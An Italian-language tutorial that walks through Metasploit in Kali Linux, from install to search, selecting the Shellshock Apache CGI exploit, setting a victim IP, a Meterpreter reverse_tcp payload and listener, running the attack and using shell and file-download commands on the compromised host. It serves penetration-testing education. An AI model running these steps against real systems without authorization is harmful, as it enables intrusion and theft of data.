Metasploit
Come utilizzare Metasploit
come utilizzare Metasploit
Ecco una guida su come utilizzare Metasploit in Kali Linux, una delle distribuzioni più popolari per il penetration testing e la sicurezza informatica.
Installazione di Metasploit
Kali Linux include Metasploit preinstallato, ma è possibile aggiornare o reinstallarlo per assicurarsi di avere l'ultima versione.
Puoi farlo con i seguenti comandi:
sudo apt update
sudo apt install metasploit-framework
Avvio di Metasploit
Per avviare Metasploit, apri il terminale e digita il seguente comando:
msfconsole
Questo comando avvia la console di Metasploit, dove puoi interagire con il framework.
Aggiornare il Database di Metasploit
Metasploit ha un database che memorizza le informazioni sugli exploit, payload e moduli. Puoi aggiornare il database con il comando:
msfdb init
Navigare tra i Moduli
Puoi cercare moduli di exploit disponibili utilizzando il comando:
search <keyword>
Ad esempio, se desideri cercare exploit per un determinato software, puoi usare:
search apache
Selezionare un Exploit
Dopo aver trovato un exploit di tuo interesse, puoi selezionarlo usando il comando `use`. Ad esempio:
use exploit/linux/http/apache_mod_cgi_bash_env_exec
Configurare i Parametri dell’Exploit
Dopo aver selezionato un exploit, devi configurarlo con i parametri necessari. Puoi visualizzare le opzioni richieste con:
show options
Configura le opzioni obbligatorie, come l'indirizzo IP della vittima e la porta, utilizzando il comando `set`. Ad esempio:
set RHOSTS <IP_della_vittima>
set RPORT 80
Selezionare un Payload
Dopo aver configurato l'exploit, è necessario selezionare un payload. Puoi cercare payload compatibili con l'exploit attivo usando:
show payloads
Seleziona un payload con il comando `use`. Ad esempio:
use payload/linux/x86/meterpreter/reverse_tcp
Configurare il Payload
Dopo aver scelto il payload, configura le sue opzioni, come l'indirizzo IP del listener. Utilizza il comando `set` come prima. Ad esempio:
set LHOST <Tuo_IP>
Eseguire l’Exploit
Una volta che hai configurato sia l’exploit che il payload, sei pronto per lanciare l’attacco. Puoi farlo con il comando:
exploit
Se tutto è andato a buon fine, il payload verrà eseguito sulla macchina bersaglio, e otterrai una sessione Meterpreter.
Interagire con la Sessione Meterpreter
Una volta che hai una sessione attiva, puoi utilizzare diversi comandi per interagire con il sistema compromesso. Alcuni comandi utili includono:
- `sysinfo`: Visualizza informazioni sul sistema bersaglio.
- `getuid`: Mostra l’utente corrente. - `shell`: Apre una shell del sistema operativo della vittima.
- `download <file>`: Scarica file dal sistema bersaglio.
- `upload <file>`: Carica file sul sistema bersaglio.
Chiudere la Sessione
Per chiudere la sessione Meterpreter, puoi utilizzare il comando:
exit
E per uscire dalla console di Metasploit, digita:
exit